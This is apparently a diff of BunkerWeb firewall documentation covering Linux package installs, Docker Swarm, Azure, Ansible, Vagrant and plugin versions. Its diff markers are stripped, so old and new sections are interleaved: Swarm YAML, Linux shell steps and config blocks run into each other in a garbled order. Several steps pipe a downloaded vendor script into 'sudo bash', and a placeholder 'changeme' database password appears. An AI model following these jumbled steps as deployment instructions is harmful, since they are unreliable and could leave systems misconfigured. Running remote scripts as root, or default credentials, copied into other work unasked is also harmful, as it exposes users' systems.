And finally install BunkerWeb 1.5.7 :
```shell
curl -s https://packagecloud.io/install/repositories/bunkerity/bunkerweb/script.deb.sh | sudo bash && \
sudo apt update && \
sudo -E apt install -y bunkerweb=1.5.7
```
To prevent upgrading NGINX and/or BunkerWeb packages when executing `apt upgrade`, you can use the following command :
```shell
sudo apt-mark hold nginx bunkerweb
```
=== "Fedora"
Fedora already provides NGINX 1.24.0 that we support :
```shell
sudo dnf install -y nginx-1.24.0
```
Optional step : if you want to automatically enable the [setup wizard](web-ui.md#setup-wizard) when BunkerWeb is installed, export the following variable :
```shell
export UI_WIZARD=1
```
And finally install BunkerWeb 1.5.7 :
```shell
curl -s https://packagecloud.io/install/repositories/bunkerity/bunkerweb/script.rpm.sh | \
sed 's/yum install -y pygpgme --disablerepo='\''bunkerity_bunkerweb'\''/yum install -y python-gnupg/g' | \
sed 's/pypgpme_check=`rpm -qa | grep -qw pygpgme`/python-gnupg_check=`rpm -qa | grep -qw python-gnupg`/g' | sudo bash && \
sudo dnf makecache && \
sudo -E dnf install -y bunkerweb-1.5.7
```
To prevent upgrading NGINX and/or BunkerWeb packages when executing `dnf upgrade`, you can use the following command :
```shell
sudo dnf versionlock add nginx && \
sudo dnf versionlock add bunkerweb
```
=== "RedHat"
The first step is to add NGINX official repository. Create the following file at `/etc/yum.repos.d/nginx.repo` :
```conf
[nginx-stable]
name=nginx stable repo
baseurl=http://nginx.org/packages/centos/$releasever/$basearch/
gpgcheck=1
enabled=1
gpgkey=https://nginx.org/keys/nginx_signing.key
module_hotfixes=true
[nginx-mainline]
name=nginx mainline repo
baseurl=http://nginx.org/packages/mainline/centos/$releasever/$basearch/
gpgcheck=1
enabled=0
gpgkey=https://nginx.org/keys/nginx_signing.key
module_hotfixes=true
```
You should now be able to install NGINX 1.24.0 :
```shell
sudo dnf install nginx-1.24.0
```
Optional step : if you want to automatically enable the [setup wizard](web-ui.md#setup-wizard) when BunkerWeb is installed, export the following variable :
```shell
export UI_WIZARD=1
```
And finally install BunkerWeb 1.5.7 :
```shell
sudo dnf install -y epel-release && \
curl -s https://packagecloud.io/install/repositories/bunkerity/bunkerweb/script.rpm.sh | sudo bash && \
sudo dnf check-update && \
sudo -E dnf install -y bunkerweb-1.5.7
```
To prevent upgrading NGINX and/or BunkerWeb packages when executing `dnf upgrade`, you can use the following command :
```shell
sudo dnf versionlock add nginx && \
sudo dnf versionlock add bunkerweb
```
The configuration of BunkerWeb is done by editing the `/etc/bunkerweb/variables.env` file :
```conf
MY_SETTING_1=value1
MY_SETTING_2=value2
...
```
BunkerWeb is managed using systemctl :
- Check BunkerWeb status : `systemctl status bunkerweb`
- Start it if it's stopped : `systemctl start bunkerweb`
- Stop it if it's started : `systemctl stop bunkerweb`
- Reload it to apply new configuration : `systemctl reload bunkerweb`
- And restart it : `systemctl restart bunkerweb`
## Docker autoconf
<figure markdown>
@ -443,186 +659,6 @@ networks:
name: bw-services
```
## Swarm
<figure markdown>
![Overview](assets/img/integration-swarm.svg){ align=center, width="600" }
<figcaption>Docker Swarm integration</figcaption>
</figure>
!!! info "Docker autoconf"
The Swarm integration is similar to the Docker autoconf one (but with services instead of containers). Please read the [Docker autoconf integration section](#docker-autoconf) first if needed.
To enable automatic configuration of BunkerWeb instances, the **autoconf** service requires access to the Docker API. This service listens for Docker Swarm events, such as service creation or deletion, and seamlessly configures the **BunkerWeb instances** in real-time without any downtime. It also monitors other Swarm objects, such as [configs](https://docs.docker.com/engine/swarm/configs/), for custom configurations.
Similar to the [Docker autoconf integration](#docker-autoconf), configuration for web services is defined using labels that start with the **bunkerweb** prefix.
For an optimal setup, it is recommended to schedule the **BunkerWeb service** as a ***global service*** on all nodes, while the **autoconf, scheduler, and Docker API proxy services** should be scheduled as ***single replicated services***. Please note that the Docker API proxy service needs to be scheduled on a manager node unless you configure it to use a remote API (which is not covered in the documentation).
Since multiple instances of BunkerWeb are running, a shared data store implemented as a [Redis](https://redis.io/) service must be created. These instances will utilize the Redis service to cache and share data. Further details regarding the Redis settings can be found [here](settings.md#redis).
As for the database volume, the documentation does not specify a specific approach. Choosing either a shared folder or a specific driver for the database volume is dependent on your unique use-case and is left as an exercise for the reader.
!!! info "Database backend"
Please be aware that our instructions assume you are using MariaDB as the default database backend, as configured by the `DATABASE_URI` setting. However, we understand that you may prefer to utilize alternative backends for your Docker integration. If that is the case, rest assured that other database backends are still possible. See docker-compose files in the [misc/integrations folder](https://github.com/bunkerity/bunkerweb/tree/v1.5.7/misc/integrations) folder of the repository for more information.
Clustered database backends setup are out-of-the-scope of this documentation.
Here is the stack boilerplate that you can deploy using `docker stack deploy` :
```yaml
version: "3.5"
services:
bunkerweb:
image: bunkerity/bunkerweb:1.5.7
ports:
- published: 80
target: 8080
mode: host
protocol: tcp
- published: 443
target: 8443
mode: host
protocol: tcp
environment:
- SERVER_NAME=
- DATABASE_URI=mariadb+pymysql://bunkerweb:changeme@bw-db:3306/db # Remember to set a stronger password for the database
- SWARM_MODE=yes
- MULTISITE=yes
- USE_REDIS=yes
- REDIS_HOST=bw-redis
- API_WHITELIST_IP=127.0.0.0/8 10.20.30.0/24
networks:
- bw-universe
- bw-services
deploy:
mode: global
placement:
constraints:
- "node.role == worker"
labels:
- "bunkerweb.INSTANCE=yes"
bw-autoconf:
image: bunkerity/bunkerweb-autoconf:1.5.7
environment:
- SWARM_MODE=yes
- DOCKER_HOST=tcp://bw-docker:2375
- DATABASE_URI=mariadb+pymysql://bunkerweb:changeme@bw-db:3306/db # Remember to set a stronger password for the database
networks:
- bw-universe
- bw-docker
deploy:
placement:
constraints:
- "node.role == worker"
bw-docker:
image: tecnativa/docker-socket-proxy:nightly
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
environment:
- CONFIGS=1
- CONTAINERS=1
- SERVICES=1
- SWARM=1
- TASKS=1
- LOG_LEVEL=warning
networks:
- bw-docker
deploy:
placement:
constraints:
- "node.role == manager"
bw-scheduler:
image: bunkerity/bunkerweb-scheduler:1.5.7
environment:
- SWARM_MODE=yes
- DOCKER_HOST=tcp://bw-docker:2375
- DATABASE_URI=mariadb+pymysql://bunkerweb:changeme@bw-db:3306/db
networks:
- bw-universe
- bw-docker
deploy:
placement:
constraints:
- "node.role == worker"
bw-db:
image: mariadb:10.10
environment:
- MYSQL_RANDOM_ROOT_PASSWORD=yes
- MYSQL_DATABASE=db
- MYSQL_USER=bunkerweb
- MYSQL_PASSWORD=changeme
volumes:
- bw-data:/var/lib/mysql
networks:
- bw-docker
deploy:
placement:
constraints:
- "node.role == worker"
bw-redis:
image: redis:7-alpine
networks:
- bw-universe
deploy:
placement:
constraints:
- "node.role == worker"
volumes:
bw-data:
networks:
bw-universe:
name: bw-universe
driver: overlay
attachable: true
ipam:
config:
- subnet: 10.20.30.0/24
bw-services:
name: bw-services
driver: overlay
attachable: true
bw-docker:
name: bw-docker
driver: overlay
attachable: true
```
!!! info "Swarm mandatory setting"
Please note that the `SWARM_MODE=yes` environment variable is mandatory when using the Swarm integration.
Once the BunkerWeb Swarm stack is set up and running (see autoconf and scheduler logs for more information), you will be able to deploy web applications in the cluster and use labels to dynamically configure BunkerWeb :
```yaml
version: "3.5"
services:
myapp:
image: mywebapp:4.2
networks:
- bw-services
deploy:
placement:
constraints:
- "node.role==worker"
labels:
- "bunkerweb.MY_SETTING_1=value1"
- "bunkerweb.MY_SETTING_2=value2"
networks:
bw-services:
external: true
name: bw-services
```
## Kubernetes
<figure markdown>
@ -937,362 +973,237 @@ spec:
...
```
## Linux
## Swarm
<figure markdown>
![Overview](assets/img/integration-linux.svg){ align=center, width="600" }
<figcaption>Linux integration</figcaption>
![Overview](assets/img/integration-swarm.svg){ align=center, width="600" }
<figcaption>Docker Swarm integration</figcaption>
</figure>
Supported Linux distributions for BunkerWeb (amd64/x86_64 and arm64/aarch64 architectures) include:
!!! info "Docker autoconf"
The Swarm integration is similar to the Docker autoconf one (but with services instead of containers). Please read the [Docker autoconf integration section](#docker-autoconf) first if needed.
- Debian 12 "Bookworm"
- Ubuntu 22.04 "Jammy"
- Ubuntu 24.04 "Noble"
- Fedora 39
- Red Hat Enterprise Linux (RHEL) 8.9
- Red Hat Enterprise Linux (RHEL) 9.3
To enable automatic configuration of BunkerWeb instances, the **autoconf** service requires access to the Docker API. This service listens for Docker Swarm events, such as service creation or deletion, and seamlessly configures the **BunkerWeb instances** in real-time without any downtime. It also monitors other Swarm objects, such as [configs](https://docs.docker.com/engine/swarm/configs/), for custom configurations.
Please ensure that you have **NGINX 1.24.0 installed before installing BunkerWeb**. For all distributions, except Fedora, it is mandatory to use prebuilt packages from the [official NGINX repository](https://nginx.org/en/linux_packages.html). Compiling NGINX from source or using packages from different repositories will not work with the official prebuilt packages of BunkerWeb. However, you have the option to build BunkerWeb from source.
Similar to the [Docker autoconf integration](#docker-autoconf), configuration for web services is defined using labels that start with the **bunkerweb** prefix.
To simplify the installation process, Linux package repositories for BunkerWeb are available on [PackageCloud](https://packagecloud.io/bunkerity/bunkerweb). They provide a bash script that automatically adds and trusts the repository. You can follow the provided script for automatic setup, or opt for [manual installation](https://packagecloud.io/bunkerity/bunkerweb/install) instructions if you prefer.
For an optimal setup, it is recommended to schedule the **BunkerWeb service** as a ***global service*** on all nodes, while the **autoconf, scheduler, and Docker API proxy services** should be scheduled as ***single replicated services***. Please note that the Docker API proxy service needs to be scheduled on a manager node unless you configure it to use a remote API (which is not covered in the documentation).
=== "Debian"
Since multiple instances of BunkerWeb are running, a shared data store implemented as a [Redis](https://redis.io/) service must be created. These instances will utilize the Redis service to cache and share data. Further details regarding the Redis settings can be found [here](settings.md#redis).
The first step is to add NGINX official repository :
As for the database volume, the documentation does not specify a specific approach. Choosing either a shared folder or a specific driver for the database volume is dependent on your unique use-case and is left as an exercise for the reader.
```shell
sudo apt install -y curl gnupg2 ca-certificates lsb-release debian-archive-keyring && \
curl https://nginx.org/keys/nginx_signing.key | gpg --dearmor \
| sudo tee /usr/share/keyrings/nginx-archive-keyring.gpg >/dev/null && \
echo "deb [signed-by=/usr/share/keyrings/nginx-archive-keyring.gpg] \
http://nginx.org/packages/debian `lsb_release -cs` nginx" \
| sudo tee /etc/apt/sources.list.d/nginx.list
```
!!! info "Database backend"
Please be aware that our instructions assume you are using MariaDB as the default database backend, as configured by the `DATABASE_URI` setting. However, we understand that you may prefer to utilize alternative backends for your Docker integration. If that is the case, rest assured that other database backends are still possible. See docker-compose files in the [misc/integrations folder](https://github.com/bunkerity/bunkerweb/tree/v1.5.7/misc/integrations) folder of the repository for more information.
You should now be able to install NGINX 1.24.0 :
Clustered database backends setup are out-of-the-scope of this documentation.
```shell
sudo apt update && \
sudo apt install -y nginx=1.24.0-1~$(lsb_release -cs)
```
Here is the stack boilerplate that you can deploy using `docker stack deploy` :
!!! warning "Testing/dev version"
If you use the `testing` or `dev` version, you will need to add the `force-bad-version` directive to your `/etc/dpkg/dpkg.cfg` file before installing BunkerWeb.
```yaml
version: "3.5"
```shell
echo "force-bad-version" | sudo tee -a /etc/dpkg/dpkg.cfg
```
services:
bunkerweb:
image: bunkerity/bunkerweb:1.5.7
ports:
- published: 80
target: 8080
mode: host
protocol: tcp
- published: 443
target: 8443
mode: host
protocol: tcp
environment:
- SERVER_NAME=
- DATABASE_URI=mariadb+pymysql://bunkerweb:changeme@bw-db:3306/db # Remember to set a stronger password for the database
- SWARM_MODE=yes
- MULTISITE=yes
- USE_REDIS=yes
- REDIS_HOST=bw-redis
- API_WHITELIST_IP=127.0.0.0/8 10.20.30.0/24
networks:
- bw-universe
- bw-services
deploy:
mode: global
placement:
constraints:
- "node.role == worker"
labels:
- "bunkerweb.INSTANCE=yes"
Optional step : if you want to automatically enable the [setup wizard](web-ui.md#setup-wizard) when BunkerWeb is installed, export the following variable :
bw-autoconf:
image: bunkerity/bunkerweb-autoconf:1.5.7
environment:
- SWARM_MODE=yes
- DOCKER_HOST=tcp://bw-docker:2375
- DATABASE_URI=mariadb+pymysql://bunkerweb:changeme@bw-db:3306/db # Remember to set a stronger password for the database
networks:
- bw-universe
- bw-docker
deploy:
placement:
constraints:
- "node.role == worker"
```shell
export UI_WIZARD=1
```
bw-docker:
image: tecnativa/docker-socket-proxy:nightly
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
environment:
- CONFIGS=1
- CONTAINERS=1
- SERVICES=1
- SWARM=1
- TASKS=1
- LOG_LEVEL=warning
networks:
- bw-docker
deploy:
placement:
constraints:
- "node.role == manager"
And finally install BunkerWeb 1.5.7 :
bw-scheduler:
image: bunkerity/bunkerweb-scheduler:1.5.7
environment:
- SWARM_MODE=yes
- DOCKER_HOST=tcp://bw-docker:2375
- DATABASE_URI=mariadb+pymysql://bunkerweb:changeme@bw-db:3306/db
networks:
- bw-universe
- bw-docker
deploy:
placement:
constraints:
- "node.role == worker"
```shell
curl -s https://packagecloud.io/install/repositories/bunkerity/bunkerweb/script.deb.sh | sudo bash && \
sudo apt update && \
sudo -E apt install -y bunkerweb=1.5.7
```
bw-db:
image: mariadb:10.10
environment:
- MYSQL_RANDOM_ROOT_PASSWORD=yes
- MYSQL_DATABASE=db
- MYSQL_USER=bunkerweb
- MYSQL_PASSWORD=changeme
volumes:
- bw-data:/var/lib/mysql
networks:
- bw-docker
deploy:
placement:
constraints:
- "node.role == worker"
To prevent upgrading NGINX and/or BunkerWeb packages when executing `apt upgrade`, you can use the following command :
bw-redis:
image: redis:7-alpine
networks:
- bw-universe
deploy:
placement:
constraints:
- "node.role == worker"
```shell
sudo apt-mark hold nginx bunkerweb
```
volumes:
bw-data:
=== "Ubuntu"
!!! example "Specifications for Ubuntu 24.04"
As of Ubuntu 24.04, the `nginx` package is not available in the official repository. You will need to use the `jammy` repository to install NGINX 1.24.0.
Also we do not yet run automated tests on Ubuntu 24.04, so please consider this version as experimental.
The first step is to add NGINX official repository :
```shell
sudo apt install -y curl gnupg2 ca-certificates lsb-release ubuntu-keyring && \
curl https://nginx.org/keys/nginx_signing.key | gpg --dearmor \
| sudo tee /usr/share/keyrings/nginx-archive-keyring.gpg >/dev/null && \
echo "deb [signed-by=/usr/share/keyrings/nginx-archive-keyring.gpg] \
http://nginx.org/packages/ubuntu jammy nginx" \
| sudo tee /etc/apt/sources.list.d/nginx.list
```
You should now be able to install NGINX 1.24.0 :
```shell
sudo apt update && \
sudo apt install -y nginx=1.24.0-1~jammy
```
!!! warning "Testing/dev version"
If you use the `testing` or `dev` version, you will need to add the `force-bad-version` directive to your `/etc/dpkg/dpkg.cfg` file before installing BunkerWeb.
```shell
echo "force-bad-version" | sudo tee -a /etc/dpkg/dpkg.cfg
```
Optional step : if you want to automatically enable the [setup wizard](web-ui.md#setup-wizard) when BunkerWeb is installed, export the following variable :
```shell
export UI_WIZARD=1
```
And finally install BunkerWeb 1.5.7 :
```shell
curl -s https://packagecloud.io/install/repositories/bunkerity/bunkerweb/script.deb.sh | sudo bash && \
sudo apt update && \
sudo -E apt install -y bunkerweb=1.5.7
```
To prevent upgrading NGINX and/or BunkerWeb packages when executing `apt upgrade`, you can use the following command :
```shell
sudo apt-mark hold nginx bunkerweb
```
=== "Fedora"
Fedora already provides NGINX 1.24.0 that we support :
```shell
sudo dnf install -y nginx-1.24.0
```
Optional step : if you want to automatically enable the [setup wizard](web-ui.md#setup-wizard) when BunkerWeb is installed, export the following variable :
```shell
export UI_WIZARD=1
```
And finally install BunkerWeb 1.5.7 :
```shell
curl -s https://packagecloud.io/install/repositories/bunkerity/bunkerweb/script.rpm.sh | \
sed 's/yum install -y pygpgme --disablerepo='\''bunkerity_bunkerweb'\''/yum install -y python-gnupg/g' | \
sed 's/pypgpme_check=`rpm -qa | grep -qw pygpgme`/python-gnupg_check=`rpm -qa | grep -qw python-gnupg`/g' | sudo bash && \
sudo dnf makecache && \
sudo -E dnf install -y bunkerweb-1.5.7
```
To prevent upgrading NGINX and/or BunkerWeb packages when executing `dnf upgrade`, you can use the following command :
```shell
sudo dnf versionlock add nginx && \
sudo dnf versionlock add bunkerweb
```
=== "RedHat"
The first step is to add NGINX official repository. Create the following file at `/etc/yum.repos.d/nginx.repo` :
```conf
[nginx-stable]
name=nginx stable repo
baseurl=http://nginx.org/packages/centos/$releasever/$basearch/
gpgcheck=1
enabled=1
gpgkey=https://nginx.org/keys/nginx_signing.key
module_hotfixes=true
[nginx-mainline]
name=nginx mainline repo
baseurl=http://nginx.org/packages/mainline/centos/$releasever/$basearch/
gpgcheck=1
enabled=0
gpgkey=https://nginx.org/keys/nginx_signing.key
module_hotfixes=true
```
You should now be able to install NGINX 1.24.0 :
```shell
sudo dnf install nginx-1.24.0
```
Optional step : if you want to automatically enable the [setup wizard](web-ui.md#setup-wizard) when BunkerWeb is installed, export the following variable :
```shell
export UI_WIZARD=1
```
And finally install BunkerWeb 1.5.7 :
```shell
sudo dnf install -y epel-release && \
curl -s https://packagecloud.io/install/repositories/bunkerity/bunkerweb/script.rpm.sh | sudo bash && \
sudo dnf check-update && \
sudo -E dnf install -y bunkerweb-1.5.7
```
To prevent upgrading NGINX and/or BunkerWeb packages when executing `dnf upgrade`, you can use the following command :
```shell
sudo dnf versionlock add nginx && \
sudo dnf versionlock add bunkerweb
```
The configuration of BunkerWeb is done by editing the `/etc/bunkerweb/variables.env` file :
```conf
MY_SETTING_1=value1
MY_SETTING_2=value2
...
networks:
bw-universe:
name: bw-universe
driver: overlay
attachable: true
ipam:
config:
- subnet: 10.20.30.0/24
bw-services:
name: bw-services
driver: overlay
attachable: true
bw-docker:
name: bw-docker
driver: overlay
attachable: true
```
BunkerWeb is managed using systemctl :
!!! info "Swarm mandatory setting"
Please note that the `SWARM_MODE=yes` environment variable is mandatory when using the Swarm integration.
- Check BunkerWeb status : `systemctl status bunkerweb`
- Start it if it's stopped : `systemctl start bunkerweb`
- Stop it if it's started : `systemctl stop bunkerweb`
- And restart : `systemctl restart bunkerweb`
Once the BunkerWeb Swarm stack is set up and running (see autoconf and scheduler logs for more information), you will be able to deploy web applications in the cluster and use labels to dynamically configure BunkerWeb :
## Ansible
```yaml
version: "3.5"
services:
myapp:
image: mywebapp:4.2
networks:
- bw-services
deploy:
placement:
constraints:
- "node.role==worker"
labels:
- "bunkerweb.MY_SETTING_1=value1"
- "bunkerweb.MY_SETTING_2=value2"
networks:
bw-services:
external: true
name: bw-services
```
## Microsoft Azure
<figure markdown>
![Overview](assets/img/integration-ansible.svg){ align=center, width="600" }
<figcaption>Ansible integration</figcaption>
![Overview](assets/img/integration-azure.webp){ align=center, width="600" }
<figcaption>Azure integration</figcaption>
</figure>
Supported Linux distributions for BunkerWeb (amd64/x86_64 and arm64/aarch64 architectures) include:
!!! info "Recommended VM size"
Please be aware while you choose the SKU of the VM. You must select a SKU compatible with Gen2 VM and we recommend starting at B2s or Ds2 series for optimal use.
- Debian 12 "Bookworm"
- Ubuntu 22.04 "Jammy"
- Ubuntu 24.04 "Noble"
- Fedora 39
- Red Hat Enterprise Linux (RHEL) 8.9
- Red Hat Enterprise Linux (RHEL) 9.3
You can easily deploy BunkerWeb on your Azure subscription in several ways:
To simplify the deployment and configuration process, [Ansible](https://docs.ansible.com/ansible/latest/index.html) can be used as an IT automation tool. Ansible enables you to configure systems, deploy software, and perform advanced IT tasks such as continuous deployments or zero downtime rolling updates.
- Azure CLI in Cloud Shell
- Azure ARM Template
- Azure portal via the Marketplace
For BunkerWeb, there is a dedicated Ansible role available on [Ansible Galaxy](https://galaxy.ansible.com/bunkerity/bunkerweb).
=== "Cloud Shell"
To proceed with the BunkerWeb Ansible role setup, follow these steps:
Create a resource group. Replace value `RG_NAME`
1. Begin by creating an inventory file that lists the IP addresses or FQDNs of the remote systems you want to manage. You can either add this information to the `/etc/ansible/hosts` file or create a separate inventory file such as `inventory.yml`. Here's an example using a TOML format:
```toml
[mybunkers]
192.0.2.50
192.0.2.51
192.0.2.52
```bash
az group create --name "RG_NAME" --location "LOCATION"
```
2. Next, establish SSH connections to the managed nodes by adding your public SSH keys to the `authorized_keys` file on each remote system. Verify that you can successfully connect to the nodes using SSH.
Create a VM with `Standard_B2s` SKU in the location of the resource group. Replace values `RG_NAME`, `VM_NAME`, `VNET_NAME`, `SUBNET_NAME`
3. Create a playbook file, such as `playbook.yml`, which will define the desired configuration using the BunkerWeb Ansible role. Here's an example playbook configuration:
```bash
```yaml
---
- hosts: all
become: true
roles:
- bunkerity.bunkerweb
az vm create --resource-group "RG_NAME" --name "VM_NAME" --image bunkerity:bunkerweb:bunkerweb:latest --accept-term --generate-ssh-keys --vnet-name "VNET_NAME" --size Standard_B2s --subnet "SUBNET_NAME"
```
4. Execute the playbook using the `ansible-playbook` command, providing the inventory file and the playbook file as arguments. For example:
Full command. Replace values `RG_NAME`, `VM_NAME`, `LOCATION`, `HOSTNAME`, `USERNAME`, `PUBLIC_IP`, `VNET_NAME`, `SUBNET_NAME`, `NSG_NAME`
```shell
ansible-playbook -i inventory.yml playbook.yml
```bash
az vm create --resource-group "RG_NAME" --name "VM_NAME" --location "LOCATION" --image bunkerity:bunkerweb:bunkerweb:latest --accept-term --generate-ssh-keys --computer-name "HOSTNAME" --admin-username "USERNAME" --public-ip-address "PUBLIC_IP" --public-ip-address-allocation Static --size Standard_B2s --public-ip-sku Standard --os-disk-delete-option Delete --nic-delete-option Delete --vnet-name "VNET_NAME" --subnet "SUBNET_NAME" --nsg "NSG_NAME"
```
By running the playbook, Ansible will apply the BunkerWeb role to all the hosts specified in the inventory, setting up the desired configuration.
=== "ARM Template"
the configuration of BunkerWeb is done by using specific role variables :
!!! info "Permissions requirement"
To deploy a ARM template, you need write access on the resources you're deploying and access to all operations on the Microsoft.Resources/deployments resource type.
To deploy a virtual machine, you need Microsoft.Compute/virtualMachines/write and Microsoft.Resources/deployments/* permissions. The what-if operation has the same permission requirements.
| Name | Type | Description | Default value |
| :-------------------: | :--------: | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------- |
| `bunkerweb_version` | string | Version of BunkerWeb to install. | `1.5.7` |
| `nginx_version` | string | Version of NGINX to install. | `1.24.0` |
| `freeze_versions` | boolean | Prevent upgrade of BunkerWeb and NGINX when performing packages upgrades. | `true` |
| `variables_env` | string | Path of the variables.env file to configure BunkerWeb. | `files/variables.env` |
| `enable_ui` | boolean | Activate the web UI. | `false` |
| `custom_ui` | string | Path of the ui.env file to configure the web UI. | `files/ui.env` |
| `custom_configs_path` | Dictionary | Each entry is a path of the folder containing custom configurations. Keys are the type of custom configs : `http`, `server-http`, `modsec`, `modsec-crs` and `default-server-http` | empty values |
| `custom_www` | string | Path of the www directory to upload. | empty value |
| `custom_plugins` | string | Path of the plugins directory to upload. | empty value |
| `custom_www_owner` | string | Default owner for www files and folders. | `nginx` |
| `custom_www_group` | string | Default group for www files and folders. | `nginx` |
Deploy the ARM Template:
## Vagrant
[![Deploy to Azure](assets/img/integration-azure-deploy.svg)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2Fbunkerity%2Fbunkerweb%2Fmaster%2Fmisc%2Fintegrations%2Fazure-arm-template.json){:target="_blank"}
<!-- TODO
<figure markdown>
![Overview](assets/img/integration-vagrant.svg){ align=center }
<figcaption>BunkerWeb integration with Vagrant</figcaption>
</figure>
-->
=== "Marketplace"
List of supported providers :
Login in [Azure portal](https://portal.azure.com){:target="_blank"}.
- virtualbox
- libvirt
Get BunkerWeb from the [Create ressource menu](https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/bunkerity.bunkerweb){:target="_blank"}.
!!! note "Supported Base Images"
Please be aware that the provided Vagrant boxes are based **exclusively on Ubuntu 22.04 "Jammy"**. While BunkerWeb supports other Linux distributions, the Vagrant setup currently only supports Ubuntu 22.04 as the base operating system. This ensures a consistent and reliable environment for users who want to deploy BunkerWeb using Vagrant.
Similar to other BunkerWeb integrations, the Vagrant setup uses **NGINX version 1.24.0**. This specific version is required to ensure compatibility and smooth functioning with BunkerWeb. Additionally, the Vagrant box includes **PHP** pre-installed, providing a ready-to-use environment for hosting PHP-based applications alongside BunkerWeb.
By using the provided Vagrant box based on Ubuntu 22.04 "Jammy", you benefit from a well-configured and integrated setup, allowing you to focus on developing and securing your applications with BunkerWeb without worrying about the underlying infrastructure.
Here are the steps to install BunkerWeb using Vagrant on Ubuntu with the supported virtualization providers (VirtualBox, and libvirt):
1. Make sure you have Vagrant and one of the supported virtualization providers (VirtualBox or libvirt) installed on your system.
2. There are two ways to install the Vagrant box with BunkerWeb: either by using a provided Vagrantfile to configure your virtual machine or by creating a new box based on the existing BunkerWeb Vagrant box, offering you flexibility in how you set up your development environment.
=== "Vagrantfile"
```shell
Vagrant.configure("2") do |config|
config.vm.box = "bunkerity/bunkerweb"
end
```
Depending on the virtualization provider you choose, you may need to install additional plugins:
* For **libvirt**, install the `vagrant-libvirt plugin`. For more information, see the [Vagrant documentation](https://www.vagrantup.com/docs/providers).
* For **VirtualBox**, install the `vagrant-vbguest` plugin. For more information, see the [Vagrant documentation](https://www.vagrantup.com/docs/providers).
=== "New Vagrant Box"
```shell
vagrant init bunkerity/bunkerweb
```
Depending on the virtualization provider you choose, you may need to install additional plugins:
* For **libvirt**, install the `vagrant-libvirt plugin`. For more information, see the [Vagrant documentation](https://www.vagrantup.com/docs/providers).
* For **VirtualBox**, install the `vagrant-vbguest` plugin. For more information, see the [Vagrant documentation](https://www.vagrantup.com/docs/providers).
After installing the necessary plugins for your chosen virtualization provider, run the following command to start the virtual machine and install BunkerWeb:
```shell
vagrant up --provider=virtualbox # or --provider=libvirt
```
Finally, to access the virtual machine using SSH, execute the following command:
```shell
vagrant ssh
```
**Example Vagrantfile**
Here is an example `Vagrantfile` for installing BunkerWeb on Ubuntu 22.04 "Jammy" using the different supported virtualization providers:
```shell
Vagrant.configure("2") do |config|
# Ubuntu 22.04 "Jammy"
config.vm.box = "bunkerity/bunkerweb"
# Uncomment the desired virtualization provider
# For VirtualBox (default)
config.vm.provider "virtualbox"
# For libvirt
# config.vm.provider "libvirt"
end
```
You can also go through the [Marketplace](https://azuremarketplace.microsoft.com/fr-fr/marketplace/apps/bunkerity.bunkerweb?tab=Overview){:target="_blank"}.


@ -8,13 +8,13 @@ Here is the list of "official" plugins that we maintain (see the [bunkerweb-plug
| Name | Version | Description | Link |
| :------------: | :-----: | :------------------------------------------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------------------------------------: |
| **ClamAV** | 1.4 | Automatically scans uploaded files with the ClamAV antivirus engine and denies the request when a file is detected as malicious. | [bunkerweb-plugins/clamav](https://github.com/bunkerity/bunkerweb-plugins/tree/main/clamav) |
| **Coraza** | 1.4 | Inspect requests using a the Coraza WAF (alternative of ModSecurity). | [bunkerweb-plugins/coraza](https://github.com/bunkerity/bunkerweb-plugins/tree/main/coraza) |
| **CrowdSec** | 1.4 | CrowdSec bouncer for BunkerWeb. | [bunkerweb-plugins/crowdsec](https://github.com/bunkerity/bunkerweb-plugins/tree/main/crowdsec) |
| **Discord** | 1.4 | Send security notifications to a Discord channel using a Webhook. | [bunkerweb-plugins/discord](https://github.com/bunkerity/bunkerweb-plugins/tree/main/discord) |
| **Slack** | 1.4 | Send security notifications to a Slack channel using a Webhook. | [bunkerweb-plugins/slack](https://github.com/bunkerity/bunkerweb-plugins/tree/main/slack) |
| **VirusTotal** | 1.4 | Automatically scans uploaded files with the VirusTotal API and denies the request when a file is detected as malicious. | [bunkerweb-plugins/virustotal](https://github.com/bunkerity/bunkerweb-plugins/tree/main/virustotal) |
| **WebHook** | 1.4 | Send security notifications to a custom HTTP endpoint using a Webhook. | [bunkerweb-plugins/webhook](https://github.com/bunkerity/bunkerweb-plugins/tree/main/webhook) |
| **ClamAV** | 1.5 | Automatically scans uploaded files with the ClamAV antivirus engine and denies the request when a file is detected as malicious. | [bunkerweb-plugins/clamav](https://github.com/bunkerity/bunkerweb-plugins/tree/main/clamav) |
| **Coraza** | 1.5 | Inspect requests using a the Coraza WAF (alternative of ModSecurity). | [bunkerweb-plugins/coraza](https://github.com/bunkerity/bunkerweb-plugins/tree/main/coraza) |
| **CrowdSec** | 1.5 | CrowdSec bouncer for BunkerWeb. | [bunkerweb-plugins/crowdsec](https://github.com/bunkerity/bunkerweb-plugins/tree/main/crowdsec) |
| **Discord** | 1.5 | Send security notifications to a Discord channel using a Webhook. | [bunkerweb-plugins/discord](https://github.com/bunkerity/bunkerweb-plugins/tree/main/discord) |
| **Slack** | 1.5 | Send security notifications to a Slack channel using a Webhook. | [bunkerweb-plugins/slack](https://github.com/bunkerity/bunkerweb-plugins/tree/main/slack) |
| **VirusTotal** | 1.5 | Automatically scans uploaded files with the VirusTotal API and denies the request when a file is detected as malicious. | [bunkerweb-plugins/virustotal](https://github.com/bunkerity/bunkerweb-plugins/tree/main/virustotal) |
| **WebHook** | 1.5 | Send security notifications to a custom HTTP endpoint using a Webhook. | [bunkerweb-plugins/webhook](https://github.com/bunkerity/bunkerweb-plugins/tree/main/webhook) |
## How to use a plugin
@ -22,7 +22,7 @@ Here is the list of "official" plugins that we maintain (see the [bunkerweb-plug
If you want to quickly install external plugins, you can use the `EXTERNAL_PLUGIN_URLS` setting. It takes a list of URLs, separated with space, pointing to compressed (zip format) archive containing one or more plugin(s).
You can use the following value if you want to automatically install the official plugins : `EXTERNAL_PLUGIN_URLS=https://github.com/bunkerity/bunkerweb-plugins/archive/refs/tags/v1.4.zip`
You can use the following value if you want to automatically install the official plugins : `EXTERNAL_PLUGIN_URLS=https://github.com/bunkerity/bunkerweb-plugins/archive/refs/tags/v1.5.zip`
### Manual
@ -248,49 +248,6 @@ The first step is to install the plugin by putting the plugin files inside the c
chown -R nginx:nginx /etc/bunkerweb/plugins
```
